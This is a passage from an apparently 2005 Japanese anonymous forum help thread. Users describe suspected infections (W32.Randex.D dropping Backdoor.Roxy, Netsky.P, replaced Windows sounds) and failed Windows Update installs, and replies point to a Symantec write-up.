タスクマネージャーを開けてみると、
wmp.exeなるプログラムが100個以上立ち上がっていました。
ドライブ内を検索した所、
C:\WINNT\wmp.exe(更新日時4/7 11:34)
C:\WINNT\system32\wmp.exe(更新日時同上)
C:\WINNT\system32\payload.dat(更新日時同上)

3つのファイルが、同一の更新時刻で入っていました。
自分は覚えがないのですが・・・・・・ウィルスでしょうか?
430名無しさん@お腹いっぱい。:2005/04/14(木) 01:15:18
>>429
ウィルススキャンしたらどうなるの?
431名無しさん@お腹いっぱい。:2005/04/14(木) 08:23:07
WindowsUpdateに関して質問です。
【使用OS】 XP
【WindowsUpdateしてるか】 通知が出るように設定してあり、手動で更新しています。
【AntiVirusは何を使っているか】 ノートン
【ちゃんとUpdateしてるか】 していない
【スキャンした結果(ウイルス名・発見場所)】 _
【別のオンラインスキャンしたならその結果は】 _
【症状を具体的に、分かる限りすべて書く】
今朝、PCを立ち上げたら自動更新の通知が出ました。
普段通り手動でインストールしたのですが、アップデートに失敗しています。(2回試しました)
今までこういう事は一度も無かったのですが・・・。
以下は更新が出来なかったプログラム一覧です。

Windows XP 用セキュリティ更新プログラム (KB893066)
Internet Explorer 6 Service Pack 1 用の累積的なセキュリティ更新プログラム (KB890923)
Windows 悪意のあるソフトウェアの削除ツール - 2005 年 4 月 (KB890830)

【何をしたらそんなことになったのか】 WindowsUpdate
【これまでにとった措置】 マイクロソフトのHPを確認→対処方法が不明
【その他の質問】 なし
432名無しさん@お腹いっぱい。:2005/04/14(木) 08:27:15
はぁ?
433名無しさん@お腹いっぱい。:2005/04/14(木) 09:36:27
>>431
どのようなエラーが出たのか書いてもらわないと
返答のしようがありません。
434名無しさん@お腹いっぱい。:2005/04/14(木) 09:44:26
>>429
モロにウィルス
ttp://www.symantec.co.cr/region/jp/sarcj/data/w/w32.randex.d.html

>また、このワームはBackdoor.Roxyとして検出される"バックドア型トロイの木馬"を投下します。
>バックドア型トロイの木馬は次のポートで攻撃者のコマンドを待機します。

>Backdoor.RoxyをPayload.datとして作成・実行します。そのバックドア型トロイの木馬は次の値
>"System Initialization"="payload.dat"を次のレジストリキーに追加することで
>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
>Windowsの起動時に必ずバックドア型トロイの木馬が実行されるようにします。

つまり、urlのウイルスじゃない、wmpがバックドア型トロイの定番を投下してる状態。
もうダメポ
435私のじゃないんですが:2005/04/14(木) 14:04:54
友人のPCなんですがw32.netsky.pを検出しました

使用OSはWinXPで、ノートンを使っているらしいです

対策を調べて差出人がわからない添付のメールを消しました
ノートンのメッセージは消えたんですがこれは駆除に成功したのでしょうか?

436名無しさん@お腹いっぱい。:2005/04/14(木) 14:13:37
Windows XP Start.wavとWindows XP Shutdown.wavが
気づいたら「腹を切って死ぬべきである」に置き換わってるんだけど・・・

やられた?
437名無しさん@お腹いっぱい。
The Microsoft Sound.wav、Windows NT ログオン.wav、Windows ログオン.wavも同様・・。